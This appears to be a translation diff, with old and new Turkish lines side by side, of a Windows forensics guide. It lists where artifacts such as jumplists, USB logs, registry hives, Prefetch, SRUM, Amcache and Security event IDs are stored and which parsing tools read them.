Bu, her uygulama için gösterilen son dosyalardır. **Uygulama tarafından kullanılan son dosyaların listesi**'dir ve her uygulamada erişebileceğiniz bir listedir. Bunlar **otomatik olarak oluşturulabilir veya özel olabilir**.
Bu, her uygulama için gösterilen son dosyalardır. **Bir uygulama tarafından kullanılan son dosyaların listesi**'dir ve her uygulamada erişebileceğiniz bir listedir. Bunlar **otomatik olarak oluşturulabilir veya özel olabilir**.
Otomatik oluşturulan **jumplist'ler**, `C:\Users\{kullanıcıadı}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` dizininde saklanır. Jumplist'ler, başlangıç ID'si uygulamanın ID'si olan `{id}.autmaticDestinations-ms` formatını takip eder.
Otomatik oluşturulan **jumplist'ler**, `C:\Users\{kullanıcıadı}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` dizininde saklanır. Jumplist'ler, genellikle uygulamanın kimliği olan başlangıç ID'sini takip eden `{id}.autmaticDestinations-ms` formatında adlandırılır.
Özel jumplist'ler, `C:\Users\{kullanıcıadı}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` dizininde saklanır ve genellikle uygulama tarafından dosya ile ilgili bir şeyin **önemli** olduğu belirtildiğinde oluşturulur (belki favori olarak işaretlenmiştir).
Özel jumplist'ler, `C:\Users\{kullanıcıadı}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` dizininde saklanır ve genellikle uygulama tarafından dosya ile ilgili **önemli bir şey** olduğunda oluşturulur (belki favori olarak işaretlenmiştir).
Herhangi bir jumplist'in **oluşturulma zamanı**, dosyanın **erişildiği ilk zamanı** gösterir ve **değiştirilme zamanı** ise son zamanı gösterir.
@ -133,9 +131,9 @@ Herhangi bir jumplist'in **oluşturulma zamanı**, dosyanın **erişildiği ilk
### Shellbags
[**Shellbags'ın ne olduğunu öğrenmek için bu bağlantıyı takip edin.**](interesting-windows-registry-keys.md#shellbags)
[**Shellbags'lerin ne olduğunu öğrenmek için bu bağlantıyı takip edin.**](interesting-windows-registry-keys.md#shellbags)
## Windows USB'lerinin Kullanımı
## Windows USB'lerin Kullanımı
Bir USB cihazının kullanıldığını belirlemek mümkündür çünkü şunlar oluşturulur:
@ -147,27 +145,27 @@ Bazı LNK dosyalarının orijinal yola değil, WPDNSE klasörüne işaret ettiğ
![](<../../../.gitbook/assets/image (476).png>)
WPDNSE klasöründeki dosyalar orijinal dosyaların bir kopyasıdır, bu nedenle PC'nin yeniden başlatılmasını sağlamazlar ve GUID bir shellbag'den alınır.
WPDNSE klasöründeki dosyalar orijinal olanların bir kopyasıdır, bu nedenle PC'nin yeniden başlatılmasını sağlamazlar ve GUID bir shellbag'den alınır.
### Kayıt Defteri Bilgileri
### Registry Bilgileri
USB bağlı cihazlar hakkında ilginç bilgiler içeren kayıt defteri anahtarlarının neler olduğunu öğrenmek için [bu sayfaya bakın](interesting-windows-registry-keys.md#usb-information).
### setupapi
USB bağlantısının ne zaman oluşturulduğu hakkında zaman damgalarını almak için `C:\Windows\inf\setupapi.dev.log` dosyasını kontrol edin ( `Section start` için arama yapın).
USB bağlantısının ne zaman oluşturulduğu hakkında zaman damgalarını almak için `C:\Windows\inf\setupapi.dev.log` dosyasını kontrol edin (`Section start` için arama yapın).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Dedektifi
[**USBDetective**](https://usbdetective.com), bir görüntüye bağlanmış USB cihazları hakkında bilgi edinmek için kullanılabilir.
[**USBDetective**](https://usbdetective.com), bir görüntüye bağlanan USB cihazları hakkında bilgi edinmek için kullanılabilir.
![](<../../../.gitbook/assets/image (483).png>)
### Tak ve Çalıştır Temizliği
'Plug and Play Temizliği' olarak bilinen zamanlanmış görev, eski sürücü sürümlerinin kaldırılması için tasarlanmıştır. En son sürücü paketi sürümünü koruma amacıyla belirtilen amacının aksine, çevrimiçi kaynaklar, son 30 günde kullanılmayan sürücülerin hedef alındığını öne sürmektedir. Sonuç olarak, son 30 günde bağlı olmayan taşınabilir cihazlar için sürücüler silinebilir.
'Plug and Play Temizliği' olarak bilinen zamanlanmış görev, eski sürücü sürümlerinin kaldırılması için tasarlanmıştır. En son sürücü paketi sürümünü koruma amacıyla belirtilenin aksine, çevrimiçi kaynaklar, son 30 günde bağlı olmayan sürücülerin hedef alındığını öne sürmektedir. Sonuç olarak, son 30 günde bağlı olmayan taşınabilir cihaz sürücüleri silinme riski altında olabilir.
Görev aşağıdaki dizinde bulunur:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
@ -180,7 +178,7 @@ Görevin içeriğini gösteren bir ekran görüntüsü sağlanmıştır:
- **UseUnifiedSchedulingEngine**: `TRUE` olarak ayarlanmıştır, genel görev zamanlama motorunun kullanıldığını gösterir.
- **MaintenanceSettings**:
- **Dönem ('P1M')**: Görev Zamanlayıcısını, düzenli Otomatik bakım sırasında aylık olarak temizlik görevini başlatmaya yönlendirir.
- **Son Tarih ('P2M')**: Görevin iki ardışık ay için başarısız olması durumunda, acil Otomatik bakım sırasında görevi yürütmek üzere Zamanlayıcıya talimat verir.
- **Son Tarih ('P2M')**: Görev Zamanlayıcısına, görev iki ardışık ay boyunca başarısız olursa, acil Durum Otomatik bakım sırasında görevi gerçekleştirmesi talimatı verir.
Bu yapılandırma, sürücülerin düzenli bakımını ve temizliğini sağlar ve ardışık başarısızlıklar durumunda görevin tekrar denemesi için hükümler içerir.
@ -188,12 +186,12 @@ Bu yapılandırma, sürücülerin düzenli bakımını ve temizliğini sağlar v
## E-postalar
E-postaların **2 ilginç bölümü vardır: Başlıklar ve e-posta içeriği**. **Başlıklar** içinde şu bilgileri bulabilirsiniz:
E-postalar **2 ilginç bölüm içerir: Başlıklar ve e-posta içeriği**. **Başlıklar** içinde şu bilgileri bulabilirsiniz:
* E-postaları **kimin** gönderdiği (e-posta adresi, IP, e-postayı yönlendiren posta sunucuları)
* E-postanın ne zaman gönderildiği
Ayrıca, `References` ve `In-Reply-To` başlıklarında mesajların kimliğini bulabilirsiniz:
Ayrıca, `References` ve `In-Reply-To` başlıklarında mesajların kimliklerini bulabilirsiniz:
![](<../../../.gitbook/assets/image (484).png>)
@ -201,9 +199,9 @@ Ayrıca, `References` ve `In-Reply-To` başlıklarında mesajların kimliğini b
Bu uygulama e-postaları HTML veya metin olarak kaydeder. E-postaları `\Users\<kullanıcıadı>\AppData\Local\Comms\Unistore\data\3\` içindeki alt klasörlerde bulabilirsiniz. E-postalar `.dat` uzantısıyla kaydedilir.
E-postaların **meta verileri** ve **kişileri** **EDB veritabanı** içinde bulunabilir: `\Users\<kullanıcıadı>\AppData\Local\Comms\UnistoreDB\store.vol`
E-postaların **meta verileri** ve **kişiler** **EDB veritabanı** içinde bulunabilir: `\Users\<kullanıcıadı>\AppData\Local\Comms\UnistoreDB\store.vol`
Dosyanın uzantısını `.vol` yerine `.edb` olarak değiştirerek [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) aracını kullanabilirsiniz. `Message` tablosu içinde e-postaları görebilirsiniz.
Dosyanın uzantısını `.vol`'den `.edb`'ye değiştirerek [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) aracını kullanabilirsiniz. `Message` tablosu içinde e-postaları görebilirsiniz.
### Microsoft Outlook
@ -212,9 +210,9 @@ Exchange sunucuları veya Outlook istemcileri kullanıldığında bazı MAPI ba
* `Mapi-Client-Submit-Time`: E-postanın gönderildiği sistem saati
* `Mapi-Conversation-Index`: Konunun çocuk mesajlarının sayısı ve konunun her mesajının zaman damgası
* `Mapi-Entry-ID`: Mesaj kimliği.
* `Mappi-Message-Flags` ve `Pr_last_Verb-Executed`: MAPI istemcisi hakkında bilgiler (mesaj okundu mu? okunmadı mı? yanıtlandı mı? yönlendirildi mi? ofiste değil mi?)
* `Mappi-Message-Flags` ve `Pr_last_Verb-Executed`: MAPI istemcisi hakkında bilgiler (mesaj okundu mu? okunmadı mı? yanıtlandı mı? yönlendirildi mi? dışarıda mı?)
Microsoft Outlook istemcisinde, gönderilen/alınan tüm mesajlar, kişiler verisi ve takvim verisi şu dizinde bir PST dosyasında saklanır:
Microsoft Outlook istemcisinde, gönderilen/alınan tüm mesajlar, kişiler verileri ve takvim verileri şu dizinde bir PST dosyasında saklanır:
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
@ -230,7 +228,7 @@ Bir **OST dosyası**, Microsoft Outlook'un **IMAP** veya **Exchange** sunucusu i
### Ek Dosyaları Kurtarma
Kaybolan ek dosyalar aşağıdaki yerlerden kurtarılabilir:
Kaybolan ek dosyalar şu yerlerden kurtarılabilir:
- **IE10 için**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- **IE11 ve üstü için**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
@ -241,13 +239,13 @@ Kaybolan ek dosyalar aşağıdaki yerlerden kurtarılabilir:
### Görüntü Önizlemeleri
- **Windows XP ve 8-8.1**: Önizlemeleri olan bir klasöre erişmek, silinmesinden sonra bile görüntü önizlemelerini depolayan bir `thumbs.db` dosyası oluşturur.
- **Windows XP ve 8-8.1**: Önizlemeler içeren bir klasöre erişmek, silinse bile resim önizlemelerini depolayan bir `thumbs.db` dosyası oluşturur.
- **Windows 7/10**: `thumbs.db`, UNC yolu üzerinden bir ağa erişildiğinde oluşturulur.
- **Windows Vista ve daha yeni sürümler**: Önizleme önizlemeleri `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` dizininde **thumbcache\_xxx.db** adlı dosyalarla merkezi olarak saklanır. Bu dosyaları görüntülemek için [**Thumbsviewer**](https://thumbsviewer.github.io) ve [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) araçları kullanılabilir.
### Windows Kayıt Defteri Bilgileri
Geniş sistem ve kullanıcı etkinlik verilerini depolayan Windows Kayıt Defteri, şu dosyalarda bulunur:
Windows Kayıt Defteri, geniş sistem ve kullanıcı etkinlik verilerini içeren dosyalarda bulunur:
- Çeşitli `HKEY_LOCAL_MACHINE` alt anahtarları için `%windir%\System32\Config`.
- `HKEY_CURRENT_USER` için `%UserProfile%{User}\NTUSER.DAT`.
@ -258,14 +256,14 @@ Geniş sistem ve kullanıcı etkinlik verilerini depolayan Windows Kayıt Defter
Kayıt defteri dosyalarını analiz etmek için bazı araçlar şunlardır:
* **Kayıt Düzenleyici**: Windows'ta yüklüdür. Geçerli oturumun Windows kayıt defterinde gezinmek için bir GUI sağlar.
* [**Kayıt Düzenleyici**](https://ericzimmerman.github.io/#!index.md): Kayıt dosyasını yüklemenize ve GUI ile gezinmenize olanak tanır. Ayrıca ilginç bilgiler içeren anahtarları vurgulayan yer işaretleri içerir.
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Yine, yüklenen kayıt defterinde gezinmenize izin veren bir GUI'ye sahiptir ve yüklenen kayıt defterindeki ilginç bilgileri vurgulayan eklentiler içerir.
* [**Windows Kayıt Defteri Kurtarma**](https://www.mitec.cz/wrr.html): Kayıt defterinden önemli bilgileri çıkarmak için yetenekli başka bir GUI uygulamasıdır.
* **Kayıt Defteri Düzenleyicisi**: Windows'ta yüklüdür. Geçerli oturumun Windows kayıt defteri içinde gezinmek için bir GUI sağlar.
* [**Kayıt Defteri Gezgini**](https://ericzimmerman.github.io/#!index.md): Kayıt defteri dosyasını yüklemenize ve GUI ile gezinmenize olanak tanır. Ayrıca ilginç bilgiler içeren anahtarları vurgulayan yer işaretleri içerir.
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Yine, yüklenen kayıt defteri içinde gezinmenize olanak tanıyan bir GUI'ye sahiptir ve yüklenen kayıt defteri içindeki ilginç bilgileri vurgulayan eklentiler içerir.
* [**Windows Kayıt Defteri Kurtarma**](https://www.mitec.cz/wrr.html): Kayıt defterinden önemli bilgileri çıkarmak için yetenekli bir GUI uygulamasıdır.
### Silinen Öğe Kurtarma
### Silinen Öğeleri Kurtarma
Bir anahtar silindiğinde işaretlenir, ancak işgal ettiği alan ihtiyaç duyulana kadar kaldırılmaz. Bu nedenle, **Kayıt Düzenleyici** gibi araçlar kullanılarak bu silinen anahtarların kurtarılması mümkündür.
Bir anahtar silindiğinde bunun belirtilerini taşır, ancak işgal ettiği alan ihtiyaç duyulana kadar kaldırılmaz. Bu nedenle, **Kayıt Defteri Gezgini** gibi araçlar kullanılarak bu silinmiş anahtarların kurtarılması mümkündür.
### Son Yazma Zamanı
@ -273,9 +271,9 @@ Her Anahtar-Değer, son olarak değiştirildiği zamanı gösteren bir **zaman d
### SAM
Dosya/hive **SAM**, sistemin **kullanıcıları, grupları ve kullanıcı şifreleri** hash'lerini içerir.
Dosya/hive **SAM**, sistemin **kullanıcıları, grupları ve kullanıcı parolaları** hash'lerini içerir.
`SAM\Domains\Account\Users` içinde kullanıcı adını, RID'yi, son girişi, son başarısız girişi, giriş sayacını, şifre politikasını ve hesabın ne zaman oluşturulduğunu elde edebilirsiniz. **Hash'leri** almak için ayrıca **SYSTEM** dosya/hive'ına ihtiyacınız vardır.
`SAM\Domains\Account\Users` içinde kullanıcı adını, RID'yi, son girişi, son başarısız girişi, giriş sayacını, parola politikasını ve hesabın ne zaman oluşturulduğunu elde edebilirsiniz. **Hash'leri** almak için ayrıca **SYSTEM** dosya/hive'ına ihtiyacınız vardır.
### Windows Kayıt Defterindeki İlginç Girişler
@ -291,21 +289,21 @@ Bu [yazıda](https://jonahacks.medium.com/investigating-common-windows-processes
### Windows Son Uygulamaları
Kayıt defterinde `NTUSER.DAT` içinde `Software\Microsoft\Current Version\Search\RecentApps` yolunda **yürütülen uygulama**, **en son çalıştırılma zamanı** ve **kaç kez** başlatıldığı hakkında bilgiler içeren alt anahtarlar bulabilirsiniz.
Kayıt defterinde `NTUSER.DAT` içinde `Software\Microsoft\Current Version\Search\RecentApps` yolunda **yürütülen uygulama**, **en son çalıştırılma zamanı** ve **kaç kez** başlatıldığı hakkında bilgiler içeren alt anahtarlar bulunabilir.
### BAM (Arka Plan Etkinlik Düzenleyicisi)
`SYSTEM` dosyasını bir kayıt düzenleyici ile açabilir ve `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` yolunda her kullanıcı tarafından **yürütülen uygulamaların bilgilerini** (yol içindeki `{SID}` dikkate alın) ve **ne zaman** çalıştırıldıklarını (zaman, kayıt defterinin Veri değerinin içindedir) bulabilirsiniz.
`SYSTEM` dosyasını bir kayıt düzenleyici ile açabilir ve `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` yolunda her kullanıcı tarafından **yürütülen uygulamalar** hakkında bilgileri (yol içindeki `{SID}` dikkate alınmalıdır) ve **ne zaman** çalıştırıldıklarını bulabilirsiniz (zaman, kayıt defterinin Veri değerinde bulunur).
### Windows Prefetch
Ön bellekleme, bir bilgisayarın, bir kullanıcının **yakın gelecekte erişebileceği gerekli kaynakları sessizce almasına** olanak tanıyan bir tekniktir, böylece kaynaklar daha hızlı erişilebilir.
Ön bellekleme, bir bilgisayarın sessizce **kullanıcının yakın gelecekte erişebileceği içeriği görüntülemek için gereken kaynakları sessizce almasına** olanak tanıyan bir tekniktir, böylece kaynaklar daha hızlı erişilebilir hale gelir.
Windows ön belleği, **daha hızlı yüklemek için yürütülen programların önbelleklerini oluşturmayı** içerir. Bu önbellekler, `.pf` uzantılı dosyalar olarak `C:\Windows\Prefetch` yolunda oluşturulur. XP/VISTA/WIN7'de 128 dosya sınırı ve Win8/Win10'da 1024 dosya sınırı vardır.
Windows ön belleği, **daha hızlı yüklemek için yürütülen programların önbelleklerini oluşturmayı** içerir. Bu önbellekler, `.pf` uzantılı dosyalar olarak `C:\Windows\Prefetch` yolunda oluşturulur. XP/VISTA/WIN7'de 128 dosya ve Win8/Win10'da 1024 dosya sınırı vardır.
Dosya adı `{program_adı}-{hash}.pf` şeklinde oluşturulur (hash, yürütülebilir dosyanın yol ve argümanlarına dayanır). W10'da bu dosyalar sıkıştırılmıştır. Dosyanın tek başına varlığı, programın bir noktada **çalıştırıldığını** gösterir.
Dosya adı `{program_adı}-{hash}.pf` şeklinde oluşturulur (hash, yürütülebilir dosyanın yol ve argümanlarına dayanır). W10'da bu dosyalar sıkıştırılmıştır. Dosyanın varlığı, programın bir noktada **çalıştırıldığını** gösterir.
Dosya `C:\Windows\Prefetch\Layout.ini`, **önbelleğe alınan dosyaların klasör adlarını** içerir. Bu dosya, **çalıştırılan dosyaların sayısı**, **çalıştırılma tarihleri** ve program tarafından **açılan dosyalar** hakkında bilgiler içerir.
Dosya `C:\Windows\Prefetch\Layout.ini`, **önbelleğe alınan dosyaların klasör adlarını** içerir. Bu dosya, **çalıştırılan dosyaların sayısı**, **çalıştırma tarihleri** ve program tarafından **açılan dosyalar** hakkında bilgiler içerir.
Bu dosyaları incelemek için [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd) aracını kullanabilirsiniz.
```bash
@ -313,9 +311,9 @@ Bu dosyaları incelemek için [**PEcmd.exe**](https://github.com/EricZimmerman/P
```
![](<../../../.gitbook/assets/image (487).png>)
### Süper Ön Yükleme
### Superprefetch
**Süper Ön Yükleme** ön yükleme ile aynı amaca sahiptir, **programları daha hızlı yükleyerek** bir sonraki yüklemenin ne olacağını tahmin eder. Ancak, ön yükleme hizmetini yerine koymaz.\
**Superprefetch**'in prefetch ile aynı amacı vardır, **yüklenecek programları daha hızlı yüklemek** için bir sonraki yüklenecek olanı tahmin ederek. Ancak, prefetch hizmetini yerine koymaz.\
Bu hizmet, `C:\Windows\Prefetch\Ag*.db` içinde veritabanı dosyaları oluşturacaktır.
Bu veritabanlarında **programın adı**, **çalıştırma sayısı**, **açılan dosyalar**, **erişilen hacim**, **tam yol**, **zaman aralıkları** ve **zaman damgaları** bulabilirsiniz.
@ -324,7 +322,7 @@ Bu bilgilere [**CrowdResponse**](https://www.crowdstrike.com/resources/community
### SRUM
**Sistem Kaynak Kullanımı İzleyicisi** (SRUM) bir işlem tarafından **tüketilen kaynakları izler**. W8'de ortaya çıktı ve verileri `C:\Windows\System32\sru\SRUDB.dat` konumunda bulunan bir ESE veritabanında saklar.
**System Resource Usage Monitor** (SRUM), bir işlem tarafından **tüketilen kaynakları izler**. W8'de ortaya çıktı ve verileri `C:\Windows\System32\sru\SRUDB.dat` konumunda bulunan bir ESE veritabanında saklar.
Aşağıdaki bilgileri verir:
@ -338,7 +336,7 @@ Aşağıdaki bilgileri verir:
Bu bilgi her 60 dakikada bir güncellenir.
Bu dosyadan bilgiyi [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) aracını kullanarak elde edebilirsiniz.
Bu dosyadan bilgi elde etmek için [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) aracını kullanabilirsiniz.
```bash
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
```
@ -363,41 +361,41 @@ Depolanan bilgileri ayrıştırmak için [**AppCompatCacheParser** aracı](https
### Amcache
**Amcache.hve** dosyası, bir sistemin üzerinde çalıştırılan uygulamalar hakkında ayrıntıları kaydeden bir kayıt hive'ıdır. Genellikle `C:\Windows\AppCompat\Programas\Amcache.hve` konumunda bulunur.
**Amcache.hve** dosyası, bir sistemin üzerinde çalıştırılan uygulamalar hakkında detayları kaydeden bir kayıt hive'ıdır. Genellikle `C:\Windows\AppCompat\Programas\Amcache.hve` konumunda bulunur.
Bu dosya, son zamanlarda çalıştırılan işlemlerin kayıtlarını saklamak için dikkat çekicidir, bu da uygulamaların bir sistemdeki etkinliğini izlemek için çok değerli bir bilgidir.
Bu dosya, son zamanlarda çalıştırılan işlemlerin kayıtlarını, yürütülebilir dosyaların yollarını ve SHA1 karma değerlerini içermesiyle dikkat çekicidir. Bu bilgi, bir sistemdeki uygulamaların faaliyetlerini izlemek için çok değerlidir.
**Amcache.hve** dosyasından verileri çıkarmak ve analiz etmek için [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) aracı kullanılabilir. Aşağıdaki komut, **Amcache.hve** dosyasının içeriğini ayrıştırmak ve sonuçları CSV formatında çıkarmak için AmcacheParser'ın nasıl kullanılacağına dair bir örnektir:
**Amcache.hve** dosyasından verileri çıkarmak ve analiz etmek için [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) aracı kullanılabilir. Aşağıdaki komut, AmcacheParser'ın **Amcache.hve** dosyasının içeriğini ayrıştırarak sonuçları CSV formatında çıkarmak için nasıl kullanılacağının bir örneğidir:
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
Oluşturulan CSV dosyaları arasında, `Amcache_Unassociated file entries` özellikle dikkat çekicidir çünkü ilişkilendirilmemiş dosya girişleri hakkında sağladığı zengin bilgilerle bilinir.
Oluşturulan CSV dosyaları arasında, `Amcache_Bağlantısız dosya girişleri` özellikle dikkat çekicidir çünkü bağlantısız dosya girişleri hakkında zengin bilgiler sağlar.
En ilginç CSV dosyası `Amcache_Unassociated file entries` olarak oluşturulmuştur.
En ilginç CSV dosyası, `Amcache_Bağlantısız dosya girişleri`dir.
### RecentFileCache
Bu sanat eseri yalnızca W7'de `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` içinde bulunabilir ve bazı ikili dosyaların son yürütülmesi hakkında bilgiler içerir.
Bu sanat eseri, `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` konumunda yalnızca W7'de bulunabilir ve bazı ikili dosyaların son yürütülmesi hakkında bilgiler içerir.
Dosyayı ayrıştırmak için [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) aracını kullanabilirsiniz.
### Zamanlanmış görevler
Onları `C:\Windows\Tasks` veya `C:\Windows\System32\Tasks` içinden çıkarabilir ve XML olarak okuyabilirsiniz.
Onları `C:\Windows\Tasks` veya `C:\Windows\System32\Tasks` konumlarından çıkarabilir ve XML olarak okuyabilirsiniz.
### Hizmetler
Hizmetleri `SYSTEM\ControlSet001\Services` altında kayıt defterinde bulabilirsiniz. Ne zaman ve neyin yürütüleceğini görebilirsiniz.
Hizmetleri `SYSTEM\ControlSet001\Services` anahtarında kayıt defterinde bulabilirsiniz. Ne zaman ve neyin yürütüleceğini görebilirsiniz.
### **Windows Mağazası**
Yüklü uygulamalar `\ProgramData\Microsoft\Windows\AppRepository\` içinde bulunabilir.\
Bu depoda sisteme yüklenen **her uygulama** hakkında **`StateRepository-Machine.srd`** veritabanı içinde bir **günlük** bulunur.
Yüklenen uygulamalar `\ProgramData\Microsoft\Windows\AppRepository\` konumunda bulunabilir.\
Bu depoda sisteme yüklenen **her uygulama** hakkında bilgi içeren **`StateRepository-Machine.srd`** veritabanı içinde bir **günlük** bulunmaktadır.
Bu veritabanının Application tablosu içinde "Uygulama Kimliği", "Paket Numarası" ve "Görüntü Adı" sütunlarını bulmak mümkündür. Bu sütunlar önceden yüklenmiş ve yüklenmiş uygulamalar hakkında bilgi içerir ve yüklenen uygulamaların kimlikleri sıralı olmalıdır.
Bu veritabanının Application tablosu içinde, "Uygulama Kimliği", "Paket Numarası" ve "Görüntü Adı" sütunlarını bulmak mümkündür. Bu sütunlar, önceden yüklenmiş ve yüklenmiş uygulamalar hakkında bilgi içerir ve yüklenen uygulamaların kimlikleri sıralı olmalıdır.
Ayrıca, yüklü uygulamaları kayıt defteri yolunda **bulabilirsiniz**: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
Ve **kaldırılan** **uygulamaları** şurada bulabilirsiniz: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
Ayrıca, yüklenen uygulamaları `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\` yolunda **bulmak** mümkündür\
Ve **kaldırılan** **uygulamaları** `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` konumunda bulabilirsiniz.
## Windows Olayları
@ -409,20 +407,20 @@ Windows olayları içinde görünen bilgiler:
* İlgili Ana Bilgisayarlar (ana bilgisayar adı, IP)
* Erişilen Varlıklar (dosyalar, klasörler, yazıcılar, hizmetler)
Olay günlükleri, Windows Vista'dan önce `C:\Windows\System32\config` içinde ve Windows Vista'dan sonra `C:\Windows\System32\winevt\Logs` içinde bulunur. Windows Vista'dan önce, olay günlükleri ikili formatta ve sonrasında **XML formatında** ve **.evtx** uzantısını kullanır.
Olay kayıtları, Windows Vista'dan önce `C:\Windows\System32\config` ve Windows Vista'dan sonra `C:\Windows\System32\winevt\Logs` konumlarında bulunmaktadır. Windows Vista'dan önce, olay kayıtları ikili formatta ve sonrasında **XML formatında** ve **.evtx** uzantısını kullanmaktadır.
Olay dosyalarının konumu, olay günlüğünün **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** içinde bulunabilir.
Olay dosyalarının konumu, olay dosyalarının **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** içinde bulunan SYSTEM kayıt defterinde bulunabilir.
Bu olaylar Windows Olay Görüntüleyicisi (**`eventvwr.msc`**) veya [**Event Log Explorer**](https://eventlogxp.com) gibi diğer araçlarla veya [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** gibi diğer araçlarla görselleştirilebilir.**
Bu olaylar, Windows Olay Görüntüleyicisi (**`eventvwr.msc`**) veya [**Olay Görüntüleyici**](https://eventlogxp.com) gibi diğer araçlarla veya [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** gibi diğer araçlarla görselleştirilebilir.
## Windows Güvenlik Olay Günlüğü Anlama
## Windows Güvenlik Olay Günlüğü Anlama
Erişim olayları, `C:\Windows\System32\winevt\Security.evtx` konumundaki güvenlik yapılandırma dosyasında kaydedilir. Bu dosyanın boyutu ayarlanabilir ve kapasitesine ulaşıldığında, eski olaylar üzerine yazılır. Kaydedilen olaylar arasında kullanıcı girişleri ve çıkışları, kullanıcı eylemleri ve güvenlik ayarlarına yapılan değişiklikler, ayrıca dosya, klasör ve paylaşılan varlıklara erişim bulunur.
Erişim olayları, `C:\Windows\System32\winevt\Security.evtx` konumundaki güvenlik yapılandırma dosyasında kaydedilir. Bu dosyanın boyutu ayarlanabilir ve kapasitesine ulaşıldığında, eski olaylar üzerine yazılır. Kaydedilen olaylar arasında kullanıcı girişleri ve çıkışları, kullanıcı eylemleri ve güvenlik ayarlarına yapılan değişiklikler, ayrıca dosya, klasör ve paylaşılan varlıklara erişim bulunmaktadır.
### Kullanıcı Kimlik Doğrulama için Ana Olay Kimlikleri:
- **Olay Kimliği 4624**: Bir kullanıcının başarılı bir şekilde kimlik doğruladığını gösterir.
- **Olay Kimliği 4625**: Kimlik doğrulama başarısızlığını belirtir.
- **Olay Kimliği 4624**: Bir kullanıcının başarılı bir şekilde kimlik doğruladığını belirtir.
- **Olay Kimliği 4625**: Bir kimlik doğrulama hatasını belirtir.
- **Olay Kimlikleri 4634/4647**: Kullanıcı çıkış olaylarını temsil eder.
- **Olay Kimliği 4672**: Yönetici ayrıcalıklarıyla girişi belirtir.
@ -433,34 +431,34 @@ Erişim olayları, `C:\Windows\System32\winevt\Security.evtx` konumundaki güven
- **Toplu (4)**: Toplu işlemlerin yürütülmesi.
- **Hizmet (5)**: Hizmet başlatmaları.
- **Vekil (6)**: Vekil kimlik doğrulaması.
- **Kilidi Aç (7)**: Şifre ile kilidin açılması.
- **Ağ Düz Metin (8)**: Genellikle IIS'den gelen düz metin şifre iletimi.
- **Kilidi Aç (7)**: Parola ile ekranın kilidinin açılması.
- **Ağ Düz Metin (8)**: Genellikle IIS'den gelen düz metin parola iletimi.
- **Yeni Kimlik Bilgileri (9)**: Erişim için farklı kimlik bilgilerinin kullanımı.
- **Uzak Etkileşimli (10)**: Uzak masaüstü veya terminal hizmetleri girişi.
- **Önbellek Etkileşimli (11)**: Etki alanı denetleyicisi ile iletişim olmadan önbellek kimlik bilgileriyle giriş.
- **Önbellek Uzak Etkileşimli (12)**: Önbellek kimlik bilgileriyle uzaktan giriş.
- **Önbellek Kilidi Aç (13)**: Önbellek kimlik bilgileriyle kilidin açılması.
- **Uzaktan Etkileşimli (10)**: Uzak masaüstü veya terminal hizmetleri girişi.
- **Önbellek Etkileşimli (11)**: Etki alanı denetleyicisi ile iletişim olmadan önbellek kimlik bilgileri ile giriş.
- **Önbellek Uzaktan Etkileşimli (12)**: Önbellek kimlik bilgileri ile uzaktan giriş.
- **Önbellek Kilidi Aç (13)**: Önbellek kimlik bilgileri ile kilidin açılması.
#### Olay Kimliği 4625 için Durum ve Alt Durum Kodları:
- **0xC0000064**: Kullanıcı adı mevcut değil - Kullanıcı adı sıralama saldırısını gösterebilir.
- **0xC000006A**: Doğru kullanıcı adı ancak yanlış şifre - Olası şifre tahmini veya kaba kuvvet saldırısını gösterebilir.
- **0xC0000234**: Kullanıcı hesabı kilitli - Birden fazla başarısız giriş denemesi sonucunda kilitlenmiş hesapları takip edebilir.
